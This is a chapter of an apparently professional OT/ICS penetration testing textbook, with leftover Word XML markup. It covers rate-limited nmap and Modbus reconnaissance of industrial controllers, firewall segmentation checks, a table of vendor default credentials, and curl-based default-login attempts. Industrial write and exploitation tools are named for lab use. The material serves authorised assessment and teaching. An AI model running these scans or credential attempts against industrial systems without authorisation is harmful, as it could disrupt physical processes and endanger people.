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IV: OT SECURITY ASSESSMENT AND PENETRATION TESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CHAPTER 15</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Active Assessment Techniques and Tool Safety</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="720" w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="006666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">From Observation to Engagement: Graduated Testing with Surgical Precision</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Apply the OT Tooling Safety Evaluation Framework — the six-question test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evaluate any active assessment tool before deployment against a live OT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device, correctly classifying it as SAFE, CAUTION, DANGEROUS, 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EXPERT-ONLY for the specific target device type and firmware version.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Execute Level 1 and Level 2 active assessment: OT-safe asset discovery using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Nmap with OT-specific profiles and Redpoint NSE scripts; Modbus read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enumeration with mbtget; EtherNet/IP device fingerprinting; and Siemens S7</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identification with s7-info — producing a complete active asset inventory.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Conduct network segmentation validation to confirm whether zone and conduit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architecture is correctly implemented — testing whether approved protocols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 zone boundaries are enforced and whether unapproved cross-zone access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 correctly blocked.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Execute a structured default credential assessment across OT systems using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vendor credential reference list, applying rate-limiting and account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lockout precautions to prevent Denial of Service through authentication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flooding.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Conduct a lateral movement simulation from a simulated IT foothold through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IT/OT boundary to an OT Crown Jewel Asset, demonstrating the historian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pivot technique and VPN-to-OT attack path.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Execute a CJA access demonstration — proving that a specific Crown Jewel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Asset is reachable and accessible — with a precisely defined and documented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stopping point that provides maximum finding impact without operational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Demonstrate understanding of industrial protocol exploitation techniques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(Modbus write, EtherNet/IP tag write, S7 PUT/GET) in a dedicated lab</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environment, explaining their operational consequence and applying them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 evidence of attack capability rather than as live attacks.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active assessment findings with the passive assessment intelligence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from Chapter 14 and the kill chain scenarios from Chapter 13 to produce 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complete assessment finding set ready for Chapter 16 reporting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="003366" w:sz="8"/>
              <w:bottom w:val="single" w:color="003366" w:sz="8"/>
              <w:right w:val="single" w:color="003366" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="DAEEF3"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15.1  Introduction: Active Assessment Built on Passive Intelligence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Chapter 14 established the intelligence foundation: the passive asset inventory, the asset communication matrix, the architecture gap findings, the SIS independence verification, and the threat intelligence correlation. Every device on the OT network has been identified. Every communication relationship has been mapped. Every discrepancy between documented and actual architecture has been recorded. The assessment team now knows exactly what they are about to interact with — which is the prerequisite for interacting with it safely.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Active assessment is the phase in which the assessment team transitions from observation to engagement — from watching the network to touching it. The transition is not abrupt: it is graduated, following the four-level escalation model that structures this chapter. Level 1 (authenticated review) generates no unsolicited traffic. Level 2 (OT-safe discovery) generates minimal, protocol-compliant traffic at low rates. Level 3 (vulnerability validation) confirms exploitability without exploiting. Level 4 (CJA access demonstration) demonstrates the attack path to the Crown Jewel Asset with a precisely defined stopping point.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Every active technique in this chapter is executed against a specific target identified in the Chapter 14 passive asset inventory. The passive assessment has determined: what protocols the target device uses (so active tools use the correct protocol); what firmware version is running (so tools known to be unsafe for that version are excluded); what the normal network load looks like (so active traffic is calibrated against the baseline); and which devices should not be touched under any circumstances (the safety system exclusions). The Chapter 14 intelligence is not a nice-to-have — it is the prerequisite for every active technique in this chapter.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  KEY CONCEPT: The Graduated Active Assessment Model</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1 — AUTHENTICATED REVIEW (Zero unsolicited traffic):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 valid credentials and authorised access, review configuration, logs,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account lists, and security settings directly on authorised systems.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 additional network traffic generated beyond normal authenticated sessions.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Examples: DCS configuration review; PLC programme logic review (read-only);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HMI account audit; VPN gateway configuration review.</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2 — OT-SAFE DISCOVERY AND ENUMERATION (Minimal, protocol-compliant traffic):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Active probing using tools confirmed safe for the target device type and firmware.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Rate-limited to levels safe for legacy OT hardware (max 50 packets/sec).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Protocol-compliant only — no malformed packets or fuzzing.</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Examples: Nmap OT-safe profile; Redpoint ICS NSE scripts; mbtget read-only;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EtherNet/IP listIdentity; S7 info query.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3 — VULNERABILITY VALIDATION (Proof-of-concept, no exploitation):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Confirming that a specific identified vulnerability is exploitable.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Does NOT fully exploit — demonstrates the vulnerability exists without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completing the exploit chain. Requires lab validation of the technique first.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Examples: Confirming default credentials are accepted (one attempt, not brute force);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confirming unauthenticated Modbus write is possible (one test register, lab value only);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confirming VPN authentication does not require MFA.</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4 — CJA ACCESS DEMONSTRATION (Controlled, with defined stopping point):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Full demonstration that a CJA can be reached via the attack path.</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Access demonstrated; capability evidenced; stopping point applied.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Examples: Reaching TriStation port on SIS (do not connect); reaching DCS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engineering interface (connect, read config, do not modify); accessing historian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without authentication (read process data, do not write or delete).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="4B0082" w:sz="8"/>
              <w:bottom w:val="single" w:color="4B0082" w:sz="8"/>
              <w:right w:val="single" w:color="4B0082" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="F3EEFF"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15.2  OT Tooling Safety Evaluation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Every tool used in active OT assessment must be evaluated before it is used against any OT device. This is not an optional quality assurance step — it is the mechanism that prevents assessment-induced incidents. The OT Tooling Safety Evaluation Framework provides a structured six-question evaluation that classifies any tool as SAFE, CAUTION, DANGEROUS, or EXPERT-ONLY for a specific target.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evaluation is device-specific, not tool-generic. A tool that is SAFE against a Rockwell ControlLogix 1756-L71S running firmware 33.011 may be DANGEROUS against a legacy Allen-Bradley SLC 500 running 1996-vintage firmware. The evaluation must be repeated for every device type and firmware version in the assessment scope.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The Six-Question OT Tooling Safety Evaluation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Q1 — TRAFFIC VOLUME: How many packets per second does this tool generate?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 threshold for most legacy OT devices: &lt; 50 packets/sec (Nmap -T2 level).</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Legacy PLC network stacks are not hardened for high-volume traffic.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Specific documented risk: Nmap -T4/-T5 default speed has crashed specific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PLC firmware (Allen-Bradley Micrologix, Siemens S7-200, GE Series 90-30).</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tool generates &gt; 100 pps against a legacy device: DANGEROUS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Q2 — PROTOCOL COMPLIANCE: Does the tool generate ONLY valid protocol frames?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Malformed packets against devices with no defensive input handling can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crash firmware. Fuzzing tools are explicitly DANGEROUS for OT production use.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tool generates malformed frames or performs fuzzing: DANGEROUS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Q3 — TARGET COMPATIBILITY: Tested against THIS device type and firmware version?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Tools tested on modern firmware may crash legacy firmware of same product.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Requirement: Vendor documentation or lab testing on identical hardware.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not confirmed safe for specific firmware version: CAUTION (lab-validate first)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Q4 — REVERSIBILITY: Can all state changes be immediately reversed?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Any tool that modifies device state (authentication, config, memory)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requires a documented rollback procedure before deployment.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tool modifies state without documented rollback: requires rollback plan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Q5 — PASSIVE ALTERNATIVE: Can the same intelligence be obtained passively?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Principle: Always use passive if passive is sufficient. Active probing is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justified ONLY when passive cannot provide equivalent intelligence.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passive alternative exists: use passive (no active tool justified)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Q6 — LAB VALIDATION: Has this tool been tested in lab on equivalent hardware?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Requirement: First-run against production OT hardware is not acceptable.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Lab testing on identical or equivalent hardware is mandatory before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deployment against production systems.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If no lab validation on equivalent hardware: CAUTION until validated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="4B0082" w:sz="8"/>
              <w:bottom w:val="single" w:color="4B0082" w:sz="8"/>
              <w:right w:val="single" w:color="4B0082" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="F3EEFF"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OT Assessment Tool Safety Reference — Complete Practitioner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Tool</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Safety Level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Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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OT-Safe Usage Requirements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Wireshark / tcpdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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SAFE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capture</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only — zero unsolicited traffic. No rate concern. SAFE for all OT networks without restriction.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Zeek</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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SAFE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analysis</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framework — generates no OT traffic. SAFE for all OT networks.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 (external)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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SAFE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exposure</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Queries Shodan database — no traffic toward target. SAFE from any location.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Nozomi/Dragos/Claroty (passive mode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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SAFE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asset monitoring</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 passive mode is configured — check vendor documentation. Active mode exists in all three products — do NOT enable during assessment. SAFE when passive mode confirmed.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Nmap — OT Safe Profile</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Host/port discovery</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MANDATORY parameters: -T2 --max-rate 50 -Pn --version-intensity 0. OT port list only: -p 102,502,20000,44818,4840,47808. Do NOT use default scan profile. Lab-validate against target firmware before production. Exclude SIS IPs.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Redpoint NSE scripts</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protocol fingerprinting</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Protocol-specific Nmap scripts (enip-info, modbus-discover, s7-info, dnp3-info). Use one script at a time. Rate-limit to &lt; 10 packets/sec per target. Lab-validate against target device type. Do NOT use discovery scripts (broadcast mode).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mbtget</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Modbus register read</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Read-only Modbus function codes ONLY (FC01, FC02, FC03, FC04). Max 1 request per 2 seconds per target. NEVER use write functions (FC05, FC06, FC10, FC16) in production. Exclude all safety system IPs.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pymodbus (read functions)</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Modbus Python client</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Read-only mode: client.read_holding_registers(), read_coils(), read_discrete_inputs() only. Rate-limit: one request per 3 seconds. Verify function code before execution. Lab-validate.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CrackMapExec</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IT-side AD enumeration</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IT-side tool only — corporate Active Directory. NOT for use against OT devices directly. Useful for demonstrating lateral movement credential path from IT to OT.</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xfreerdp / RDP client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CAUTION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desktop testing</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Authentication test only — one attempt with pre-agreed test credentials. Do NOT attempt brute force. Confirm account lockout threshold with OT Engineering before testing. Document immediately.</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Nmap — Default Profile</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DANGEROUS</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 not use)</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profile (-T3, all ports) has crashed specific PLC firmware. NEVER use default profile against OT devices. ONLY use the OT-safe profile with explicit rate limiting.</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Nessus/OpenVAS — Default</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DANGEROUS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 not use)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plugins include DoS tests, brute force, and intrusive checks that crash OT firmware. ONLY use with OT-specific scan policy disabling all intrusive plugins — and only after lab validation.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Metasploit — ICS modules</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EXPERT ONLY</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Exploitation (lab)</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Contains ICS modules (Modbus client, GE SRTP, Triconex tools). Lab environment ONLY. Lab validation mandatory. Rollback plan required. Expert OT assessor with process engineer present. NEVER against production SIS.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pymodbus (write functions)</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EXPERT ONLY</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exploitation (lab)</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Write functions (FC05/06/10/16) used ONLY in lab environment on isolated test PLC. NEVER against production devices. Documents attack capability; does not execute against operational systems.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pycomm3 (write mode)</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EXPERT ONLY</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EtherNet/IP write (lab)</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Tag writes to ControlLogix PLC — lab environment ONLY with isolated test hardware. Documents unauthenticated write capability; not executed against production.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Hydra/Medusa (OT targets)</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DANGEROUS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Credential brute force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Rate-limiting mandatory. Max 1 attempt per 3 seconds. Test ONLY documented default credential list (5–10 entries). NEVER brute force. Account lockout can take OT device offline. Exclude SIS entirely.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15.3  Level 1: Authenticated Review — Intelligence Without Interaction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Level 1 active assessment uses legitimate, authorised credentials to review system configuration, audit logs, account lists, and security settings — the same activities that a legitimate system administrator would perform. It generates no unsolicited network traffic because all sessions are initiated by the assessment team using pre-approved, authorised credentials.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Level 1 is not a passive technique — it actively connects to systems and retrieves information that passive capture alone cannot provide. But it carries minimal operational risk because it generates no novel traffic patterns, places no unexpected load on OT devices, and can be performed without any risk of crashing legacy hardware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">15.3.1  DCS/SCADA Configuration Review</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With authorised read-only access to DCS engineering software (Honeywell Experion ECS, Yokogawa CENTUM VP, Emerson DeltaV), the assessment team reviews the configuration for security-relevant settings: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Account management: How many user accounts exist? Are there shared accounts? When were passwords last changed? Are there accounts for former employees or contractors? Are there accounts with administrative privileges that should have operator-level access only?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Audit logging: Is audit logging enabled? What events are logged? How long are logs retained? Are logs protected from modification? Is there a mechanism to alert on critical events (failed logins, configuration changes)?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Network configuration: What network interfaces are configured? What remote access methods are enabled? Are there any unexpected network connections in the configuration?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Control logic review: Are there any hardcoded credentials in the control logic? Are there any ladder rungs or function blocks that could be misused (e.g., network communication blocks that weren't in the process description)?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15.3.2  PLC Programme Logic Review</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With authorised access to PLC engineering software (RSLogix 5000/Studio 5000 for Allen-Bradley; TIA Portal for Siemens; Unity Pro/EcoStruxure for Schneider), the assessment team reviews the PLC programme for security-relevant issues. This is a read-only review — no programme modifications are made.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1 — Authorised PLC Programme Review (Allen-Bradley ControlLogix)</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Review ControlLogix PLC programme for security-relevant issues.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Lab ControlLogix PLC with Studio 5000 installed on assessment laptop.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Pre-requisite: Authorised credentials; scope document authorises Level 1 review.</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Connect to PLC via Studio 5000 (read-only mode)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Open Studio 5000 → Go Online → Browse network → Select target PLC</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Connection mode: 'Read Only' (critical — confirm before proceeding)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Status bar should show: 'Online [Read Only]'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Review programme for security indicators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Task list: How many tasks? What are the scan rates?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Unusual very-short-interval tasks may be malware-added tasks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Routine list: Are all routines named and documented?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Anonymous routines (e.g., 'Routine_001') with no description = investigate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Tag list: Are any tags named with credential patterns (e.g., 'password', 'key')?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Hardcoded credentials in tags are a HIGH finding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MSG instructions: Does the programme contain any MSG (Message) instructions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communicating to unexpected IP addresses? Any MSG to corporate subnet = finding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Compare programme checksum against vendor baseline (if available)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Review security settings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Controller Properties → Security tab</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Protection level: None / Level 1 (programme) / Level 2 (firmware)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Finding: Protection level = None means any connected client can download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Finding: Password-protected but known/default password = still a finding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Check firmware version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Controller Properties → General → Revision: [version]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Cross-reference against ICS-CERT advisory database and CVE-2022-1159</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 Firmware version | Applicable CVEs | Active exploitation?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5: Go Offline — disconnect before noting findings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Controller → Go Offline → Disconnect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 all findings BEFORE disconnecting (screenshots with timestamp)</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15.4  Level 2: OT-Safe Asset Discovery and Protocol Enumeration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Level 2 active assessment generates minimal, protocol-compliant traffic to identify and fingerprint OT devices. Every technique in this section has been validated against the OT Tooling Safety Evaluation Framework. The Nmap OT-safe profile, Redpoint ICS scripts, mbtget Modbus enumerator, and S7 fingerprinting scripts are the primary tools — each with specific rate-limiting, parameter, and exclusion requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">15.4.1  Nmap OT-Safe Profile — Active Host and Port Discovery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Nmap OT-SAFE profile specified below MUST be used in its entirety.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Do NOT omit any of the specified parameters. In particular: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--max-rate 50: MANDATORY — higher rates have crashed legacy PLC firmware.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-T2: MANDATORY — Aggressive timing (-T4/-T5) is incompatible with OT networks.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-Pn: MANDATORY — ICMP echo can crash specific RTU firmware.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--version-intensity 0: MANDATORY — Service version detection at intensity &gt; 0</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sends additional probes that can crash OT web stacks.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Exclude SIS IP range from ALL Nmap scans regardless of other authorisations.</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2 — Nmap OT-Safe Active Discovery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Build an active asset inventory from authorised Nmap scanning.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Lab OT network with authorised scope. Never in production without auth.</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Pre-requisite: Chapter 14 passive asset inventory complete; all IPs confirmed.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Remove SIS IP addresses from all Nmap target ranges.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For Sunrise Refinery: exclude 10.5.0.0/24 (SIS zone) from all commands below.</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Nmap OT-Safe Profile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NMAP OT-SAFE PROFILE — COMPLETE PARAMETER SET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DO NOT MODIFY RATE PARAMETERS. DO NOT ADD -T3, -T4, OR -T5.</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Host discovery (ICMP-free — use ARP only on local subnet)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-sn --send-eth -n 10.4.0.0/24 --exclude 10.5.0.0/24</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-sn: no port scan — host discovery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--send-eth: ARP discovery (local subnet only — no ICMP)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 no DNS resolution (prevents DNS leakage to corporate)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list of live hosts on the subnet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OT port scan (OT-safe profile — named ports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-sV --version-intensity 0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 102,502,20000,44818,4840,47808,1962,11001,20547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-T2 --max-rate 50 -Pn -n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--host-timeout 30s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10.4.0.100-111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-oA /tmp/nmap_ot_zone4</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reference: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102   — Siemens S7 (ISO-TSAP)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502   — Modbus TCP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20000 — DNP3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44818 — EtherNet/IP (Allen-Bradley)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4840  — OPC-UA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47808 — BACnet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1962  — PCWorx (Phoenix Contact)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11001 — CoDeSys (many vendors)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20547 — ProConOS (Phoenix Contact)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 open ports per host; service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-oA: output in all formats (nmap, xml, gnmap) for later processing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Parse results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/tmp/nmap_ot_zone4.nmap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Example output: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Nmap scan report for 10.4.0.100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Host is up (0.0043s latency).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STATE SERVICE VERSION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502/tcp open  modbus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44818/tcp open  EtherNet/IP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80/tcp  open  http    (unexpected — web interface on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Cross-reference active results against passive inventory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Any host found by Nmap that is NOT in passive inventory = NEW DEVICE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Any open port not seen in passive capture = investigate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Discrepancies are findings regardless of severity classification</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15.4.2  Redpoint ICS Protocol Enumeration Scripts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Redpoint project (Digital Bond / github.com/digitalbond/Redpoint) provides Nmap NSE scripts specifically written for ICS protocol enumeration. These scripts use minimal, protocol-compliant queries to extract device identification information from OT protocols — vendor name, product type, firmware version, and serial number — providing the validated active device fingerprint.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Redpoint ICS NSE Scripts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Install Redpoint scripts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git clone https://github.com/digitalbond/Redpoint.git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cp Redpoint/*.nse /usr/share/nmap/scripts/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nmap --script-updatedb</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EtherNet/IP device identification (Allen-Bradley/Rockwell)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Sends CIP ListIdentity request — safe, standard CIP discovery mechanism</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-sU --script enip-info -p 44818 10.4.0.100 -T2 --max-rate 10 -Pn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STATE  SERVICE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44818/udp open   EtherNet/IP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enip-info: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IP: 10.4.0.100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Vendor: Rockwell Automation/Allen-Bradley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Product Name: 1756-L71S/A ControlLogix5571S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Serial Number: 0x60FA8E12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Product Code: 166</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Revision: 32.011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|_  Status: 0x0060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KEY FINDING: Firmware 32.011 &lt; 33.011 = CVE-2022-1159 APPLICABLE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Modbus device identification (all Modbus devices)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Uses Modbus function code 0x2B (Encapsulated Interface Transport)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Sub-function 0x0E = Read Device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--script modbus-discover -p 502 10.4.0.100 -T2 --max-rate 10 -Pn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STATE SERVICE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502/tcp open  modbus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modbus-discover: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Unit ID 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|_  Unit ID 2 (Slave ID data available)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Siemens S7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Note: Validate against target S7 firmware version in lab before use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--script s7-info -p 102 10.4.0.200 -T2 --max-rate 10 -Pn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STATE SERVICE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102/tcp open  iso-tsap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s7-info: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Module: 6ES7315-2EH14-0AB0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Basic HW: 6ES7315-2EH14-0AB0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System Name: SIMATIC 300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Module Type: CPU 315-2 PN/DP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Serial Number: S C-X5N015182013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|_  Copyright: Original Siemens Equipment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Cross-reference: s7-info reveals exact CPU model for CVE cross-reference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DNP3 outstation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--script dnp3-info -p 20000 10.4.0.150 -T2 --max-rate 10 -Pn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Note: DNP3 identification varies by implementation.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Some RTUs will respond; others require specific master address configuration.</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15.4.3  mbtget — Modbus Read Enumeration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mbtget is a lightweight Modbus client that allows the assessment team to read specific holding registers from a Modbus slave. In Level 2 assessment, it is used in read-only mode to confirm that unauthenticated Modbus read access is possible and to identify process value registers. This is a confirmation of the passive assessment finding — the passive capture showed Modbus polling traffic; the mbtget read confirms that any device on the network can perform those reads without authentication.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mbtget Modbus Enumeration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mbtget — Safe Modbus register reading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Install: pip3 install mbtget  OR  git clone mbtget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Read holding registers (FC03) — process values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Rate: 1 request per 3 seconds (conservative for legacy hardware)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mbtget -r 1 -n 10 -t 3 10.4.0.100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 1: start at register address 1 (Modbus address 40001)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 10: read 10 registers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 3: timeout 3 seconds per request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r[1]: 950    &lt;- Temperature setpoint (×10 = 95.0°C)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r[2]: 8500   &lt;- Pressure reading (×100 = 85.00 bar)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r[3]: 1      &lt;- Compressor run status (1 = running)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r[4]: 0      &lt;- Alarm status (0 = no alarm)</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r[5]: 1200   &lt;- PAHH pressure trip limit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r[6]: 0      &lt;- ESD status (0 = not tripped)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Read coils (FC01) — digital output states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mbtget -t1 -r 1 -n 16 10.4.0.100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Reveals: valve positions (open/closed), motor states, relay states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Read discrete inputs (FC02) — digital input states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mbtget -t2 -r 1 -n 16 10.4.0.100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Reveals: sensor states, switch positions, field device status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Document the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Finding: Modbus read access available without authentication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Impact: An adversary with network access can read all process data,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identify alarm limits and trip setpoints, and plan targeted attacks.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This is the information gathering stage of T0842 (Network Sniffing)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and precedes T0836 (Modify Parameter) in the ATT&amp;CK for ICS model.</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15.5  Level 2: Network Segmentation Validation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Network segmentation validation is the active confirmation that the zone and conduit architecture defined in the IEC 62443 risk assessment is actually implemented in the network — that the firewalls enforce the intended zone separation, that approved protocols at zone boundaries are the only protocols permitted, and that unapproved cross-zone access is correctly blocked.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consistently one of the highest-value active assessment activities because the discrepancy between documented architecture and actual implementation is almost universal. Organisations that have invested significant effort in designing zone architectures frequently have those architectures partially or wholly undermined by legacy connections, vendor exceptions, change-management failures, and undocumented modifications.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3 — Zone Boundary Testing: Corporate IT to OT Operations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Determine whether the documented firewall between the corporate IT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network (192.168.0.0/24) and the OT Operations zone (10.3.0.0/24) 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correctly enforced.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position: Authorised test machine placed in the corporate IT segment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(192.168.0.100) by the IT Security Liaison.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Target: OT Operations zone hosts identified in passive asset inventory.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ICMP reachability test (should be BLOCKED by firewall)</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Zone Boundary Testing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From corporate IT machine (192.168.0.100):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1: Basic ICMP echo to OT network gateway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ping -c 4 10.3.0.1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(firewall in place): 'Request timeout for icmp_seq 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(no segmentation): 'Reply from 10.3.0.1: bytes=32 time=2ms'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2: OT protocol port connectivity — should ALL be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nmap -p 502,44818,20000,102,4840 10.3.0.0/24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-T2 --max-rate 20 -Pn -n --open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All ports 'filtered' — firewall blocking OT protocols from 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Any port showing 'open' = segmentation failure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3: Modbus TCP from corporate network (should be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mbtget -r 1 -n 5 10.3.0.50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'Connection refused' or timeout — Modbus blocked at firewall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r[1]: [value] = Modbus accessible from corporate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SEVERITY: CRITICAL — unauthenticated OT protocol from corporate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4: Web interfaces (HTTP/HTTPS) — may be intentionally accessible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-v http://10.3.0.50 --max-time 5 2&gt;&amp;1 | head -20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Check: Is historian web interface accessible from corporate?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If accessible: check authentication before flagging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5: RDP/VNC to OT workstations (should be BLOCKED or MFA-protected)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nmap -p 3389,5900 10.3.0.0/24 -T2 --max-rate 20 -Pn -n --open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RDP/VNC open from corporate = direct OT workstation access from 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DOCUMENT RESULTS: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For each test: Protocol | Source zone | Target | Result | Finding ID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Expected results table becomes the segmentation validation evidence</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Conduit Policy Validation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ADVANCED: Test conduit policy enforcement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The IEC 62443 conduit should only permit specific protocols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whether protocols NOT in the approved conduit list can pass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From corporate IT (192.168.0.100) — testing Zone 1 → Zone 3 conduit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Approved: OPC-UA (port 4840) historian read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NOT approved: Modbus (502), EtherNet/IP (44818), SMB (445), RDP (3389)</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for port in 502 44818 4840 445 3389 20000 102; do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result=$(nmap -p $port 10.3.0.50 -Pn -T2 --max-rate 5 -n 2&gt;/dev/null | grep -E 'open|closed|filtered')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echo "Port $port: $result"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done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output (correctly segmented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502: 502/tcp filtered modbus         &lt;- CORRECT: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44818: 44818/tcp filtered             &lt;- CORRECT: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4840: 4840/tcp open OPC-UA           &lt;- EXPECTED: approved protocol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445: 445/tcp filtered microsoft-ds   &lt;- CORRECT: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3389: 3389/tcp filtered ms-wbt-server &lt;- CORRECT: blocked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output (unsegmented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502: 502/tcp open modbus             &lt;- CRITICAL: Modbus from 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44818: 44818/tcp open                &lt;- CRITICAL: EtherNet/IP from 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open port beyond approved list = CRITICAL or HIGH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Document: Source zone | Destination zone | Unauthorised port | Open/Filtered</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Segmentation Validation Results Matrix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200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="19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Source Zone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Target Zone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Modbus (502)</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EtherNet/IP (44818)</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OPC-UA (4840)</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RDP (3389)</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Finding</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Corporate IT (192.168.0.0/24)</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(10.3.0.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>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 CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>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 CRITICAL</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(check auth)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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 HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="196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SR-AV-001: No Zone 1→Zone 3 segmentation. Full IT access to OT Operations zone confirmed.</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Corporate IT (192.168.0.0/24)</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(10.4.0.0/24)</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Correctly segmented. Corporate IT cannot reach Control zone directly.</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(10.3.0.0/24)</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(10.4.0.0/24)</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(DCS master)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OPEN (DCS)</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zone has expected Modbus and EtherNet/IP access to Control zone. Verify source IPs are DCS masters only.</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(10.3.0.0/24)</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Zone (10.5.0.0/24)</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FILTERED ✓</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zone correctly isolated from Operations zone. (Confirm with passive SIS independence verification.)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15.6  Level 2: Default Credential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Default credentials are the single most commonly exploited vulnerability in OT environments. Study after study — from CISA advisories to Dragos Year in Review data — confirms that a substantial proportion of industrial control system compromises begin with default or shared credentials. The assessment must confirm whether default credentials are in use, because no amount of network segmentation prevents an attack that uses legitimate credentials.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default credential assessment is conducted with strict rate limiting and a predefined maximum attempt count — to confirm the presence of default credentials without triggering account lockout that would take an OT device offline. The Five Cardinal Rules prohibit DoS against OT systems; an authentication flood that triggers lockout is a DoS.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BEFORE DEFAULT CREDENTIAL TESTING ON ANY OT DEVICE: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Confirm the account lockout threshold with the OT Engineering Liaison.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'What happens after [N] failed login attempts on this device?'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If the answer is 'the account locks' — ensure your attempt count is safely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below the lockout threshold (minimum 3 attempts below).</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Confirm whether lockout can be remotely unlocked or requires physical access.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If lockout requires physical site visit to unlock: allow only 1–2 attempts.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Exclude ALL safety system (SIS, HIPPS) devices from credential testing.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Test ONLY the documented default credentials from the reference list.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 NOT attempt brute force. This is not an IT penetration test.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Rate limit: minimum 3 seconds between each attempt per device.</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OT Default Credential Reference — Major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200"/>
        <w:gridCol w:w="21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Vendor/Product</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System Type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Default Username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Default Password</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Notes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Rockwell ControlLogix (pre-v20)</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authentication required — any CIP client connects. v20+ supports password protection.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Rockwell ControlLogix (v20+)</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 web interface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Web server on port 80. Check password protection status via Studio 5000 Controller Properties → Security.</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Siemens S7-1200/1500</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Access protection disabled by default. Check TIA Portal project for access level configuration.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Schneider Modicon M340</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 web interface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USER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USER</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Web management interface. Also try: admin/admin, guest/guest.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GE Automation PLCs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 web</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GE Series 90 and PACSystems. Web and GE Proficy HMI.</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Honeywell Experion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Experion Server and Station. Also check: guest/[blank], operator/[blank].</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Wonderware InTouch</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HMI</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Windows-based — also check Windows default credentials. ArchestrA IDE uses Windows auth.</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FactoryTalk View (Rockwell)</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HMI</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FTView Site Edition. Also check: RSView/[blank].</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OSIsoft PI Server</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Administrator</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PI Server management. Also: piadmin/piadmin.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ICONICS Genesis64</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SCADA/HMI platform. Web-based interfaces also check IIS authentication defaults.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Cisco switches (OT)</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Also: cisco/cisco, admin/[blank]. Particularly relevant for managed switches in OT network.</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Moxa switches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admin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[blank]</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Industrial Ethernet switches commonly deployed in OT environments.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Advantech B+B SmartWorx</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access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root</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root</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Cellular gateways used for remote RTU access — often with factory defaults unchanged.</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ProSoft iTRAK gateways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converter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user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user</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Communication gateways between OT protocols — often overlooked in assessments.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4 — Default Credential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Determine whether OT devices in scope use factory default credentials.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Lab OT network with authorised scope and confirmed lockout thresholds.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Web interface credential testing (HTTP/HTTPS on port 80/443)</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Default Credential Testing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Web interface testing — rate limited, default creds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Target: OT historian web interface at 10.3.0.50 (in scope, confirmed in passive inv.)</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Attempt 1: admin/admin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-v --user 'admin:admin' http://10.3.0.50/ --max-time 10 2&gt;&amp;1 | grep -E 'HTTP|Location|title'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200 OK + dashboard content = SUCCESS (default creds accepted) =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401 Unauthorized = failed (expected)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302 to /login = redirect (try again via browser or follow redirect)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sleep 3  # Rate limit — 3 seconds between attempts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Attempt 2: administrator/[blank]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-v --user 'administrator:' http://10.3.0.50/ --max-time 10 2&gt;&amp;1 | grep -E 'HTTP|Location'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sleep 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Attempt 3: guest/guest (do not exceed lockout threshold - 3)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-v --user 'guest:guest' http://10.3.0.50/ --max-time 10 2&gt;&amp;1 | grep -E 'HTTP|Location'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If any attempt returns 200 OK: CRITICAL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Document: URL | Credential pair | Response code | 